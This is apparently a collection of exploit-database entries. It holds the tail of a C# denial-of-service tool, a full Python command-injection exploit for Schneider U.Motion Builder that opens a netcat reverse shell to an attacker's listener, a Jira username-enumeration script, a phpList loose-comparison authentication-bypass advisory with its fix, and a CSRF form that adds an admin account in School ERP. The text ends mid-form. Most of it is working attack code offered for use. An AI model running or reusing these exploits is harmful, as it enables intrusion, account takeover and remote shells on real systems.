            {
                Console.WriteLine("DoS attack completed!");
                Thread.Sleep(20000);
            }
        }
/*
BEFORE PATCH APPLIED (after ~100 seconds of attacking):
3700 threads spawned, VIRT went from 3388M to 32.1G, RES from 60000 to 129M. CPU usage ~10%. The server struggles to process commands. Recovers in several minutes after the attack is stopped
AFTER PATCH APPLIED:
10 threads spawned at most, VIRT didnt change, RES didnt change. CPU usage ~3%. Works fine. */
            
# Exploit Title: Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection
# Date: 2018-08-01
# Exploit Author: Cosmin Craciun
# Vendor Homepage: https://www.se.com
# Version: <= 1.3.4
# Tested on: Delivered Virtual Appliance running on Windows 10 x64
# CVE : CVE-2018-7777
# References: https://github.com/cosmin91ro

#!/usr/bin/python


from __future__ import print_function
import httplib
import urllib
import argparse
import re
import sys
import socket
import threading
import time

parser = argparse.ArgumentParser(description='PoC')
parser.add_argument('--target',  help='IP or hostname of target', required=True)
parser.add_argument('--port',  help='TCP port the target app is running', required=True, default='8080')
parser.add_argument('--username',  help='username for the target app login', required=True, default='admin')
parser.add_argument('--password',  help='password for the target app login', required=True, default='admin')
parser.add_argument('--command', help='malicious command to run', default='shell')
parser.add_argument('--src_ip', help='IP of listener for the reverse shell', required=True)
parser.add_argument('--timeout', help='time in seconds to wait for a response', type=int, default=3)

class Exploiter(threading.Thread):
    def __init__ (self, target, port, timeout, uri, body, headers, shell_mode):
        threading.Thread.__init__(self)
        self.target = target
        self.port = port
        self.timeout = timeout
        self.uri = uri
        self.body = body
        self.headers = headers
        self.shell_mode = shell_mode

    def send_exploit(self, target, port, timeout, uri, body, headers):
        print('Sending exploit ...')
        conn = httplib.HTTPConnection("{0}:{1}".format(target, port), timeout=timeout)
        conn.request("POST", uri, body, headers)
        print("Exploit sent")
        if not self.shell_mode: print("Getting response ...")

        try:
            response = conn.getresponse()
            if not self.shell_mode: print(str(response.status) + " " + response.reason)
            data = response.read()
            if not self.shell_mode: print('Response: {0}\r\nCheck the exploit result'.format(data))

        except socket.timeout:
            if not self.shell_mode: print("Connection timeout while waiting response from the target.\r\nCheck the exploit result")

    def run(self):
        self.send_exploit(self.target, self.port, self.timeout, self.uri, self.body, self.headers)

class Listener(threading.Thread):
    def __init__(self, src_ip):
        threading.Thread.__init__(self)
        self.src_ip = src_ip

    def run(self):
        self.listen(self.src_ip)

    def listen(self, src_ip):
        TCP_IP = src_ip
        TCP_PORT = 4444
        BUFFER_SIZE = 1024

        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.bind((TCP_IP, TCP_PORT))
            print("Listener open on port {0}".format(TCP_PORT))
            s.listen(1)

            conn, addr = s.accept()
            print('Exploited: ' + str(addr))

            while 1:
                comm = raw_input("shell$ ").strip()
                if comm == "quit":
                    conn.close()
                    sys.exit(0)

                if comm != "":
                    conn.send(comm + " 2>&1" + "\x0a")
                    while 1:
                        data = conn.recv(BUFFER_SIZE)
                        if not data: break
                        print(data, end="")
                        if "\x0a" in data: break

        except Exception as ex:
            print("Could not start listener")
            print(ex)

def login(target, port, username, password):
    uri = "http://{0}:{1}/umotion/modules/system/user_login.php".format(target, port)

    params = urllib.urlencode({
        'username': username,
        'password': password,
        'rememberMe': '1',
        'context': 'configuration',
        'op': 'login'
    })

    headers = {
        "Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Accept": "*/*"
    }

    try:
        conn = httplib.HTTPConnection("{0}:{1}".format(target, port))
        conn.request("POST", uri, params, headers)
        response = conn.getresponse()
        print(str(response.status) + " " + response.reason)
        data = response.read()
    except socket.timeout:
        print("Connection timeout while logging in. Check if the server is available")
        return


    cookie = response.getheader("Set-Cookie")
    #print(cookie)

    r = re.match(r'PHPSESSID=(.{26});.*loginSeed=(.{32})', cookie)
    if r is None:
        print("Regex not match, could not get cookies")
        return

    if len(r.groups()) < 2:
        print("Error while getting cookies")
        return

    sessid = r.groups()[0]
    login_seed = r.groups()[1]

    return sessid, login_seed

    conn.close()


def encode_multipart_formdata(fields, files):
    LIMIT = '----------lImIt_of_THE_fIle_eW_$'
    CRLF = '\r\n'
    L = []
    for (key, value) in fields:
        L.append('--' + LIMIT)
        L.append('Content-Disposition: form-data; name="%s"' % key)
        L.append('')
        L.append(value)
    for (key, filename, value) in files:
        L.append('--' + LIMIT)
        L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename))
        L.append('Content-Type: application/x-gzip')
        L.append('')
        L.append(value)
    L.append('--' + LIMIT + '--')
    L.append('')
    body = CRLF.join(L)
    content_type = 'multipart/form-data; boundary=%s' % LIMIT
    return content_type, body


def exploit(target, port, username, password, command, timeout):
    uri = "http://{0}:{1}/umotion/modules/system/update_module.php".format(target, port)

    fields = [
        ('choose_update_mode', 'MANUAL'),
        ('add_button', '0'),
        ('format', 'json'),
        ('step', '2'),
        ('next', '1'),
        ('name_update_file', ''),
        ('path_update_file', ''),
        ('type_update_file', '')
    ]

    listener = None
    if command == "shell":
        shell_mode = True
        command = "nc -e $SHELL {0} 4444".format(args.src_ip)
        listener = Listener(args.src_ip)
        listener.start()
        time.sleep(3)
    else:
        shell_mode = False

    files = [
        ('update_file', 'my;{0};file.tar.gz'.format(command), "\x1f\x8b")
    ]

    content_type, body = encode_multipart_formdata(fields, files)

    if not shell_mode or (shell_mode and listener and listener.isAlive()):
        print('Logging in ...')
        sess_id, login_seed = login(target, port, username, password)
        if sess_id is None or login_seed is None:
            print('Error while logging in')
            return

        print('Logged in ! ')

        headers = {
            'Accept': 'application/json,text/javascript,*/*; q=0.01',
            'Accept-Encoding': 'gzip,deflate',
            'Referer': 'http://{0}:{1}/umotion/modules/system/externalframe.php?context=configuration'.format(target, port),
            'X-Requested-With': 'XMLHttpRequest',
            'Content-Length': len(body),
            'Content-Type': content_type,
            'Connection': 'keep-alive',
            'Cookie': 'PHPSESSID={0}; loginSeed={1}'.format(sess_id, login_seed)
        }

        exploiter = Exploiter(target, port, timeout, uri, body, headers, shell_mode)
        exploiter.start()

if __name__ == '__main__':
    args = parser.parse_args()
    exploit(args.target, args.port, args.username, args.password, args.command, args.timeout)
            
# Exploit Title: Jira 8.3.4 - Information Disclosure (Username Enumeration)
# Date: 2019-09-11
# Exploit Author: Mufeed VH
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/jira
# Version: 8.3.4
# Tested on: Pop!_OS 19.10
# CVE : CVE-2019-8449

# CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4
# DETAILS :: https://www.cvedetails.com/cve/CVE-2019-8449/
# CONFIRM :: https://jira.atlassian.com/browse/JRASERVER-69796

#!/usr/bin/env python


__author__  = "Mufeed VH (@mufeedvh)"

import os
import requests


class CVE_2019_8449:
    def ask_for_domain(self):
        domain = raw_input("[>] Enter the domain of Jira instance: => ")
        if domain == "":
            print("\n[-] ERROR: domain is required\n")
            # Re-prompt and return, so the empty value does not overwrite self.url below
            return self.ask_for_domain()
        self.url = "https://{}/rest/api/latest/groupuserpicker".format(domain)

    def ask_for_query(self):
        self.query = raw_input("[>] Enter search query: [required] (Example: admin) => ")
        if self.query == "":
            print("\n[-] ERROR: The query parameter is required\n")
            self.ask_for_query()    

    def exploit(self):
        self.ask_for_domain()
        self.ask_for_query()

        maxResults = raw_input("\n[>] Enter the number of maximum results to fetch: (50) => ")
        showAvatar = raw_input("\n[>] Enter 'true' or 'false' whether to show Avatar of the user or not: (false) => ")
        fieldId = raw_input("\n[>] Enter the fieldId to fetch: => ")
        projectId = raw_input("\n[>] Enter the projectId to fetch: => ")
        issueTypeId = raw_input("\n[>] Enter the issueTypeId to fetch: => ")
        avatarSize = raw_input("\n[>] Enter the size of Avatar to fetch: (xsmall) => ")
        caseInsensitive = raw_input("\n[>] Enter 'true' or 'false' whether to show results case insensitive or not: (false) => ")
        excludeConnectAddons = raw_input("\n[>] Indicates whether Connect app users and groups should be excluded from the search results. If an invalid value is provided, the default value is used: (false) => ")    

        params = {
            'query': self.query, 
            'maxResults': maxResults, 
            'showAvatar': showAvatar, 
            'fieldId': fieldId, 
            'projectId': projectId, 
            'issueTypeId': issueTypeId, 
            'avatarSize': avatarSize, 
            'caseInsensitive': caseInsensitive, 
            'excludeConnectAddons': excludeConnectAddons
        }

        send_it = requests.get(url = self.url, params = params)

        try:
            response = send_it.json()
        except:
            print("\n[-] ERROR: Something went wrong, the request didn't respond with a JSON result.")
            print("[-] INFO: It is likely that the domain you've entered is wrong or this Jira instance is not exploitable.")
            print("[-] INFO: Try visiting the target endpoint manually ({}) and confirm the endpoint is accessible.".format(self.url))
            quit()
        
        print("\n<========== RESPONSE ==========>\n")
        print(response)
        print("\n<==============================>\n")

if __name__ == '__main__':
    os.system('cls' if os.name == 'nt' else 'clear')
    
    print('''
        ================================================
        |                                              |
        | CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4 |
        |  Proof of Concept By: Mufeed VH [@mufeedvh]  |
        |                                              |
        ================================================
    ''')

    CVE_2019_8449().exploit()
            
# Exploit Title: phpList 3.5.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-02-03
# Exploit Author: Suvadip Kar
# Author Contact: https://twitter.com/spidersec
# Vendor Homepage: https://www.phplist.org
# Software Link: https://www.phplist.org/download-phplist/
# Version: 3.5.0
# Tested on: Linux
# CVE : CVE-2020-8547

Background of the Vulnerability :

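PHP's loose comparison '==' compares two strings as numbers when both look numeric, so two hashes of the form '0e' followed only by digits are both read as 0 (scientific notation) and compare equal even though the strings differ.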

EXAMPLE CODE:

 <?php
 var_dump(hash('sha256', 'TyNOQHUS') == '0e66298694359207596086558843543959518835691168370379069085300385');
 var_dump(hash('sha256', '34250003024812') == '0e66298694359207596086558843543959518835691168370379069085300385');
 ?>

OUTPUT:

bool(true)
bool(true)

Vulnerable code:

GITHUB: https://github.com/phpList/phplist3/blob/master/public_html/lists/admin/phpListAdminAuthentication.php
-----
if(empty($login)||($password=="")){
    return array(0, s('Please enter your credentials.'));
}
if ($admindata['disabled']) {
    return array(0, s('your account has been disabled'));
}
if (//Password validation.
    !empty($passwordDB) && $encryptedPass == $passwordDB // Vulnerable because loose comparison is used
)
    return array($admindata['id'], 'OK');
 else {
    if (!empty($GLOBALS['admin_auth_module'])) {
        Error(s('Admin authentication has changed, please update your admin module'),
            'https://resources.phplist.com/documentation/errors/adminauthchange');
        return;
        }
return array(0, s('incorrect password'));

}
-------

Steps to reproduce:

 1. Set the string 'TyNOQHUS' as password for username 'admin'. Its sha256 value is 0e66298694359207596086558843543959518835691168370379069085300385.

 2. Now navigate to endpoint '/admin' and try to login with username 'admin' password 'TyNOQHUS'.

 3. User Logged in with valid password.

 4. Now logout from the application and try to login with username 'admin' password '34250003024812'.

 5. User Logged in, without valid password.

 6. Authentication bypassed because of PHP loose comparison.

 FIX: This vulnerability can be fixed by using strict comparison (===) in place of loose comparison.
 -----
 if(empty($login)||($password=="")){
     return array(0, s('Please enter your credentials.'));
 }
 if ($admindata['disabled']) {
     return array(0, s('your account has been disabled'));
 }
 if (//Password validation.
     !empty($passwordDB) && $encryptedPass === $passwordDB // Fixed by using strict comparison '==='.
 )
     return array($admindata['id'], 'OK');
  else {
     if (!empty($GLOBALS['admin_auth_module'])) {
         Error(s('Admin authentication has changed, please update your admin module'),
             'https://resources.phplist.com/documentation/errors/adminauthchange');
         return;
         }
 return array(0, s('incorrect password'));

 }
 -------

Additional Resource: https://www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf
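
The comparison behaviour described above, as an added example (not phpList's code): a loose check in the style of the vulnerable line, a hardened check using hash_equals(), and an audit that flags stored digests PHP would read as the number 0. The function names are hypothetical, and every sample digest except the one quoted in this advisory is constructed.

```php
<?php
declare(strict_types=1);

// Added illustration; function names are hypothetical, not phpList's API.

/**
 * True when PHP reads the digest as zero in scientific notation
 * ("0e" followed only by digits). Any two such strings are equal under '=='.
 */
function is_magic_hash(string $hash): bool
{
    return preg_match('/\A0+e[0-9]+\z/i', $hash) === 1;
}

/** Same shape as the vulnerable line: loose comparison of two digests. */
function check_loose(string $computed, string $stored): bool
{
    return $stored !== '' && $computed == $stored;
}

/** Hardened form: byte-for-byte, constant-time comparison. */
function check_strict(string $computed, string $stored): bool
{
    return $stored !== '' && hash_equals($stored, $computed);
}

/**
 * Audit helper: given login => stored digest, return the logins whose
 * digest would match any other "0e<digits>" digest under '=='.
 */
function audit_stored_hashes(array $rows): array
{
    $exposed = [];
    foreach ($rows as $login => $hash) {
        if (is_string($hash) && is_magic_hash($hash)) {
            $exposed[] = $login;
        }
    }
    return $exposed;
}

// Constructed sample data. The 'admin' value is the digest quoted in this
// advisory; the other values are made-up strings, not real SHA-256 output.
$stored = [
    'admin'  => '0e66298694359207596086558843543959518835691168370379069085300385',
    'editor' => str_repeat('ab12', 16),
];
$other = '0e' . str_repeat('1', 62); // constructed "0e<digits>" digest

var_dump(check_loose($other, $stored['admin']));
var_dump(check_strict($other, $stored['admin']));
var_dump(audit_stored_hashes($stored));
```

The loose check accepts the constructed digest for 'admin', hash_equals() rejects it, and the audit lists 'admin' as the only exposed login.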
            
# Title: School ERP System 1.0 - Cross Site Request Forgery (Add Admin)
# Date: 2020-01-31
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://sourceforge.net/projects/school-erp-ultimate/files/
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/files/
# Version: ERP-Ultimate
# CVE: CVE-2020-8504,CVE-2020-8505
# Tested on: Windows 10/Kali Rolling
# The School ERP Ultimate web application is vulnerable to Cross Site Request Forgery 
# that leads to admin account creation and arbitrary user deletion.
# Proof of Concept for the Admin Account Creation:
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://SITEHERE/office_admin/?pid=42&action=addadmin" method="POST">
      <input type="hidden" name="admin&#95;fname" value="Admin" />
      <input type="hidden" name="admin&#95;lname" value="Tester" />
      <input type="hidden" name="admin&#95;username" value="testing" />
      <input type="hidden" name="admin&#95;password" value="testing123" />
      <input type="hidden" name="admin&#95;password2" value="testing123" />
      <input type="hidden" name="admin&#95;email" value="test&#64;test&#46;com" />
      <input type="hidden" name="admin&#95;phoneno" value="9999999999" />
      <input type="hidden" name="adminlevel" value="" />
      <input type="hidden" name="admin&#95;more" value="Test" />
      <input type="hidden" name="1&#95;p" value="1&#95;p" />
      <input type="hidden" name="1&#95;1" value="1&#95;1" />
      <input type="hidden" name="1&#95;2" value="1&#95;2" />
      <input type="hidden" name="1&#95;4" value="1&#95;4" />
      <input type="hidden" name="1&#95;3" value="1&#95;3" />
      <input type="hidden" name="2&#95;p" value="2&#95;p" />
      <input type="hidden" name="2&#95;1" value="2&#95;1" />
      <input type="hidden" name="2&#95;2" value="2&#95;2" />
      <input type="hidden" name="2&#95;3" value="2&#95;3" />
      <input type="hidden" name="2&#95;4" value="2&#95;4" />
      <input type="hidden" name="2&#95;5" value="2&#95;5" />
      <input type="hidden" name="2&#95;6" value="2&#95;6" />
      <input type="hidden" name="2&#95;7" value="2&#95;7" />
      <input type="hidden" name="2&#95;8" value="2&#95;8" />
      <input type="hidden" name="2&#95;9" value="2&#95;9" />
      <input type="hidden" name="2&#95;10" value="2&#95;10" />
      <input type="hidden" name="2&#95;11" value="2&#95;11" />
      <input type="hidden" name="2&#95;12" value="2&#95;12" />
      <input type="hidden" name="2&#95;13" value="2&#95;13" />
      <input type="hidden" name="2&#95;14" value="2&#95;14" />
      <input type="hidden" name="2&#95;15" value="2&#95;15" />
      <input type="hidden" name="2&#95;20" value="2&#95;20" />
      <input type="hidden" name="2&#95;18" value="2&#95;18" />
      <input type="hidden" name="2&#95;19" value="2&#95;19" />
      <input type="hidden" name="3&#95;p" value="3&#95;p" />
      <input type="hidden" name="3&#95;1" value="3&#95;1" />
      <input type="hidden" name="3&#95;2" value="3&#95;2" />
      <input type="hidden" name="3&#95;3" value="3&#95;3" />
      <input type="hidden" name="3&#95;5" value="3&#95;5" />
      <input type="hidden" name="3&#95;4" value="3&#95;4" />
      <input type="hidden" name="4&#95;p" value="4&#95;p" />
      <input type="hidden" name="5&#95;p" value="5&#95;p" />
      <input type="hidden" name="5&#95;1" value="5&#95;1" />
      <input type="hidden" name="5&#95;3" value="5&#95;3" />
      <input type="hidden" name="5&#95;2" value="5&#95;2" />
      <input type="hidden" name="5&#95;5" value="5&#95;5" />
      <input type="hidden" name="5&#95;6" value="5&#95;6" />
      <input type="hidden" name="6&#95;p" value="6&#95;p" />
      <input type="hidden" name="7&#95;p" value="7&#95;p" />
      <input type="hidden" name="7&#95;1" value="7&#95;1" />
      <input type="hidden" name="7&#95;2" value="7&#95;2" />
      <input type="hidden" name="7&#95;3" value="7&#95;3" />
      <input type="hidden" name="7&#95;4" value="7&#95;4" />
      <input type="hidden" name="7&#95;5" value="7&#95;5" />
      <input type="hidden" name="8&#95;p" value="8&#95;p" />
      <input type="hidden" name="8&#95;1" value="8&#95;1" />
      <input type="hidden" name="8&#95;2" value="8&#95;2" />
      <input type="hidden" name="8&#95;3" value="8&#95;3" />
      <input type="hidden" name="8&#95;101" value="8&#95;101" />
      <input type="hidden" name="8&#95;4" value="8&#95;4" />
      <input type="hidden" name="8&#95;5" value="8&#95;5" />
      <input type="hidden" name="8&#95;6" value="8&#95;6" />
      <input type="hidden" name="8&#95;16" value="8&#95;16" />
      <input type="hidden" name="8&#95;102" value="8&#95;102" />
      <input type="hidden" name="8&#95;7" value="8&#95;7" />
      <input type="hidden" name="8&#95;8" value="8&#95;8" />
      <input type="hidden" name="8&#95;9" value="8&#95;9" />
      <input type="hidden" name="8&#95;17" value="8&#95;17" />
      <input type="hidden" name="8&#95;103" value="8&#95;103" />
      <input type="hidden" name="8&#95;104" value="8&#95;104" />
      <input type="hidden" name="8&#95;10" value="8&#95;10" />
      <input type="hidden" name="8&#95;11" value="8&#95;11" />
      <input type="hidden" name="8&#95;12" value="8&#95;12" />
      <input type="hidden" name="8&#95;18" value="8&#95;18" />
      <input type="hidden" name="8&#95;105" value="8&#95;105" />
      <input type="hidden" name="8&#95;106" value="8&#95;106" />
      <input type="hidden" name="8&#95;13" value="8&#95;13" />
      <input type="hidden" name="8&#95;14" value="8&#95;14" />
      <input type="hidden" name="8&#95;15" value="8&#95;15" />
      <input type="hidden" name="8&#95;19" value="8&#95;19" />
      <input type="hidden" name="8&#95;107" value="8&#95;107" />
      <input type="hidden" name="8&#95;108" value="8&#95;108" />
      <input type="hidden" name="9&#95;p" value="9&#95;p" />
      <input type="hidden" name="9&#95;1" value="9&#95;1" />
      <input type="hidden" name="9&#95;17" value="9&#95;17" />
      <input type="hidden" name="9&#95;18" value="9&#95;18" />
      <input type="hidden" name="9&#95;19" value="9&#95;19" />
      <input type="hidden" name="9&#95;2" value="9&#95;2" />
      <input type="hidden" name="9&#95;20" value="9&#95;20" />
      <input type="hidden" name="9&#95;21" value="9&#95;21" />
      <input type="hidden" name="9&#95;22" value="9&#95;22" />
      <input type="hidden" name="9&#95;3" value="9&#95;3" />
      <input type="hidden" name="9&#95;4" value="9&#95;4" />
      <input type="hidden" name="9&#95;5" value="9&#95;5" />
      <input type="hidden" name="9&#95;6" value="9&#95;6" />
      <input type="hidden" name="9&#95;101" value="9&#95;101" />
      <input type="hidden" name="9&#95;7" value="9&#95;7" />
      <input type="hidden" name="9&#95;102" value="9&#95;102" />
      <input type="hidden" name="9&#95;8" value="9&#95;8" />
      <input type="hidden" name="9&#95;103" value="9&#95;103" />
      <input type="hidden" name="9&#95;24" value="9&#95;24" />
      <input type="hidden" name="9&#95;25" value="9&#95;25" />
      <input type="hidden" name="9&#95;33" value="9&#95;33" />
      <input type="hidden" name="9&#95;23" value="9&#95;23" />
      <input type="hidden" name="9&#95;11" value="9&#95;11" />
      <input type="hidden" name="9&#95;13" value="9&#95;13" />
      <input type="hidden" name="9&#95;27" value="9&#95;27" />
      <input type="hidden" name="9&#95;14" value="9&#95;14" />
      <input type="hidden" name="9&#95;29" value="9&#95;29" />
      <input type="hidden" name="9&#95;30" value="9&#95;30" />
      <input type="hidden" name="9&#95;31" value="9&#95;31" />
      <input type="hidden" name="9&#95;15" value="9&#95;15" />
      <input type="hidden" name="9&#95;16" value="9&#95;16" />
      <input type="hidden" name="9&#95;32" value="9&#95;32" />
      <input type="hidden" name="10&#95;p" value="10&#95;p" />
      <input type="hidden" name="10&#95;1" value="10&#95;1" />
      <input type="hidden" name="10&#95;2" value="10&#95;2" />
      <input type="hidden" name="10&#95;3" value="10&#95;3" />
      <input type="hidden" name="10&#95;4" value="10&#95;4" />
      <input type="hidden" name="10&#95;5" value="10&#95;5" />
      <input type="hidden" name="10&#95;6" value="10&#95;6" />
      <input type="hidden" name="10&#95;7" value="10&#95;7" />
      <input type="hidden" name="10&#95;8" value="10&#95;8" />
      <input type="hidden" name="10&#95;11" value="10&#95;11" />
      <input type="hidden" name="10&#95;9" value="10&#95;9" />
      <input type="hidden" name="10&#95;10" value="10&#95;10" />
      <input type="hidden" name="10&#95;12" value="10&#95;12" />
      <input type="hidden" name="11&#95;p" value="11&#95;p" />
      <input type="hidden" name="11&#95;1" value="11&#95;1" />
      <input type="hidden" name="11&#95;2" value="11&#95;2" />
      <input type="hidden" name="11&#95;3" value="11&#95;3" />
      <input type="hidden" name="11&#95;4" value="11&#95;4" />
      <input type="hidden" name="11&#95;5" value="11&#95;5" />
      <input type="hidden" name="11&#95;6" value="11&#95;6" />
      <input type="hidden" name="11&#95;7" value="11&#95;7" />
      <input type="hidden" name="11&#95;8" value="11&#95;8" />
      <input type="hidden" name="11&#95;9" value="11&#95;9" />
      <input type="hidden" name="11&#95;10" value="11&#95;10" />
      <input type="hidden" name="11&#95;11" value="11&#95;11" />
      <input type="hidden" name="11&#95;12" value="11&#95;12" />
      <input type="hidden" name="11&#95;13" value="11&#95;13" />
      <input type="hidden" name="11&#95;14" value="11&#95;14" />
      <input type="hidden" name="11&#95;15" value="11&#95;15" />
      <input type="hidden" name="11&#95;16" value="11&#95;16" />
      <input type="hidden" name="11&#95;17" value="11&#95;17" />
      <input type="hidden" name="11&#95;18" value="11&#95;18" />
      <input type="hidden" name="11&#95;19" value="11&#95;19" />
      <input type="hidden" name="11&#95;20" value="11&#95;20" />
      <input type="hidden" name="11&#95;21" value="11&#95;21" />
      <input type="hidden" name="11&#95;23" value="11&#95;23" />
      <input type="hidden" name="11&#95;101" value="11&#95;101" />
      <input type="hidden" name="11&#95;102" value="11&#95;102" />
      <input type="hidden" name="11&#95;22" value="11&#95;22" />
      <input type="hidden" name="11&#95;103" value="11&#95;103" />
      <input type="hidden" name="11&#95;104" value="11&#95;104" />
      <input type="hidden" name="12&#95;p" value="12&#95;p" />
      <input type="hidden" name="12&#95;1" value="12&#95;1" />
      <input type="hidden" name="12&#95;2" value="12&#95;2" />
      <input type="hidden" name="12&#95;3" value="12&#95;3" />
      <input type="hidden" name="12&#95;4" value="12&#95;4" />
      <input type="hidden" name="12&#95;5" value="12&#95;5" />
      <input type="hidden" name="12&#95;11" value="12&#95;11" />
      <input type="hidden" name="12&#95;6" value="12&#95;6" />
      <input type="hidden" name="12&#95;7" value="12&#95;7" />
      <input type="hidden" name="12&#95;8" value="12&#95;8" />
      <input type="hidden" name="12&#95;12" value="12&#95;12" />
      <input type="hidden" name="12&#95;9" value="12&#95;9" />
      <input type="hidden" name="12&#95;10" value="12&#95;10" />
      <input type="hidden" name="13&#95;p" value="13&#95;p" />
      <input type="hidden" name="13&#95;1" value="13&#95;1" />
      <input type="hidden" name="13&#95;2" value="13&#95;2" />
      <input type="hidden" name="13&#95;3" value="13&#95;3" />
      <input type="hidden" name="13&#95;17" value="13&#95;17" />
      <input type="hidden" name="13&#95;4" value="13&#95;4" />
      <input type="hidden" name="13&#95;5" value="13&#95;5" />
      <input type="hidden" name="13&#95;6" value="13&#95;6" />
      <input type="hidden" name="13&#95;18" value="13&#95;18" />
      <input type="hidden" name="13&#95;7" value="13&#95;7" />
      <input type="hidden" name="13&#95;8" value="13&#95;8" />
      <input type="hidden" name="13&#95;9" value="13&#95;9" />
      <input type="hidden" name="13&#95;19" value="13&#95;19" />
      <input type="hidden" name="13&#95;20" value="13&#95;20" />
      <input type="hidden" name="13&#95;10" value="13&#95;10" />
      <input type="hidden" name="13&#95;11" value="13&#95;11" />
      <input type="hidden" name="13&#95;12" value="13&#95;12" />
      <input type="hidden" name="13&#95;21" value="13&#95;21" />
      <input type="hidden" name="13&#95;22" value="13&#95;22" />
      <input type="hidden" name="13&#95;13" value="13&#95;13" />
      <input type="hidden" name="13&#95;14" value="13&#95;14" />
      <input type="hidden" name="13&#95;15" value="13&#95;15" />
      <input type="hidden" name="13&#95;16" value="13&#95;16" />
      <input type="hidden" name="13&#95;108" value="13&#95;108" />
      <input type="hidden" name="13&#95;23" value="13&#95;23" />
      <input type="hidden" name="13&#95;101" value="13&#95;101" />
      <input type="hidden" name="13&#95;102" value="13&#95;102" />
      <input type="hidden" name="13&#95;103" value="13&#95;103" />
      <input type="hidden" name="13&#95;104" value="13&#95;104" />
      <input type="hidden" name="13&#95;106" value="13&#95;106" />
      <input type="hidden" name="13&#95;105" value="13&#95;105" />
      <input type="hidden" name="14&#95;p" value="14&#95;p" />
      <input type="hidden" name="14&#95;1" value="14&#95;1" />
      <input type="hidden" name="14&#95;2" value="14&#95;2" />
      <input type="hidden" name="14&#95;3" value="14&#95;3" />
      <input type="hidden" name="14&#95;101" value="14&#95;101" />
      <input type="hidden" name="14&#95;4" value="14&#95;4" />
      <input type="hidden" name="14&#95;5" value="14&#95;5" />
      <input type="hidden" name="14&#95;6" value="14&#95;6" />
      <input type="hidden" name="14&#95;102" value="14&#95;102" />
      <input type="hidden" name="14&#95;7" value="14&#95;7" />
      <input type="hidden" name="14&#95;8" value="14&#95;8" />
      <input type="hidden" name="14&#95;9" value="14&#95;9" />
      <input type="hidden" name="14&#95;103" value="14&#95;103" />
      <input type="hidden" name="14&#95;10" value="14&#95;10" />
      <input type="hidden" name="14&#95;21" value="14&#95;21" />
      <input type="hidden" name="14&#95;104" value="14&#95;104" />
      <input type="hidden" name="14&#95;11" value="14&#95;11" />
      <input type="hidden" name="14&#95;105" value="14&#95;105" />
      <input type="hidden" name="14&#95;12" value="14&#95;12" />
      <input type="hidden" name="14&#95;106" value="14&#95;106" />
      <input type="hidden" name="14&#95;13" value="14&#95;13" />
      <input type="hidden" name="14&#95;14" value="14&#95;14" />
      <input type="hidden" name="14&#95;15" value="14&#95;15" />
      <input type="hidden" name="14&#95;16" value="14&#95;16" />
      <input type="hidden" name="14&#95;107" value="14&#95;107" />
      <input type="hidden" name="14&#95;17" value="14&#95;17" />
      <input type="hidden" name="14&#95;18" value="14&#95;18" />
      <input type="hidden" name="14&#95;19" value="14&#95;19" />
      <input type="hidden" name="14&#95;20" value="14&#95;20" />
      <input type="hidden" name="15&#95;p" value="15&#95;p" />
      <input type="hidden" name="15&#95;1" value="15&#95;1" />
      <input type="hidden" name="15&#95;2" value="15&#95;2" />
      <input type="hidden" name="15&#95;3" value="15&#95;3" />
      <input type="hidden" name="16&#95;p" value="16&#95;p" />
      <input type="hidden" name="16&#95;1" value="16&#95;1" />
      <input type="hidden" name="16&#95;2" value="16&#95;2" />
      <input type="hidden" name="16&#95;3" value="16&#95;3" />
      <input type="hidden" name="16&#95;101" value="16&#95;101" />
      <input type="hidden" name="16&#95;4" value="16&#95;4" />
      <input type="hidden" name="16&#95;5" value="16&#95;5" />
      <input type="hidden" name="16&#95;6" value="16&#95;6" />
      <input type="hidden" name="16&#95;102" value="16&#95;102" />
      <input type="hidden" name="16&#95;7" value="16&#95;7" />
      <input type="hidden" name="16&#95;8" value="16&#95;8" />
      <input type="hidden" name="16&#95;10" value="16&#95;10" />
      <input type="hidden" name="16&#95;11" value="16&#95;11" />
      <input type="hidden" name="16&#95;12" value="16&#95;12" />
      <input type="hidden" name="16&#95;103" value="16&#95;103" />
      <input type="hidden" name="16&#95;13" value="16&#95;13" />
      <input type="hidden" name="16&#95;14" value="16&#95;14" />
      <input type="hidden" name="16&#95;15" value="16&#95;15" />
      <input type="hidden" name="16&#95;17" value="16&#95;17" />
      <input type="hidden" name="16&#95;18" value="16&#95;18" />
      <input type="hidden" name="16&#95;20" value="16&#95;20" />
      <input type="hidden" name="16&#95;21" value="16&#95;21" />
      <input type="hidden" name="16&#95;24" value="16&#95;24" />
      <input type="hidden" name="16&#95;104" value="16&#95;104" />
      <input type="hidden" name="16&#95;105" value="16&#95;105" />
      <input type="hidden" name="16&#95;22" value="16&#95;22" />
      <input type="hidden" name="16&#95;25" value="16&#95;25" />
      <input type="hidden" name="16&#95;23" value="16&#95;23" />
      <input type="hidden" name="16&#95;26" value="16&#95;26" />
      <input type="hidden" name="16&#95;106" value="16&#95;106" />
      <input type="hidden" name="16&#95;107" value="16&#95;107" />
      <input type="hidden" name="16&#95;27" value="16&#95;27" />
      <input type="hidden" name="16&#95;28" value="16&#95;28" />
      <input type="hidden" name="16&#95;29" value="16&#95;29" />
      <input type="hidden" name="17&#95;p" value="17&#95;p" />
      <input type="hidden" name="17&#95;1" value="17&#95;1" />
      <input type="hidden" name="17&#95;6" value="17&#95;6" />
      <input type="hidden" name="17&#95;2" value="17&#95;2" />
      <input type="hidden" name="17&#95;3" value="17&#95;3" />
      <input type="hidden" name="17&#95;101" value="17&#95;101" />
      <input type="hidden" name="17&#95;4" value="17&#95;4" />
      <input type="hidden" name="17&#95;5" value="17&#95;5" />
      <input type="hidden" name="17&#95;7" value="17&#95;7" />
      <input type="hidden" name="17&#95;8" value="17&#95;8" />
      <input type="hidden" name="17&#95;9" value="17&#95;9" />
      <input type="hidden" name="18&#95;p" value="18&#95;p" />
      <input type="hidden" name="18&#95;5" value="18&#95;5" />
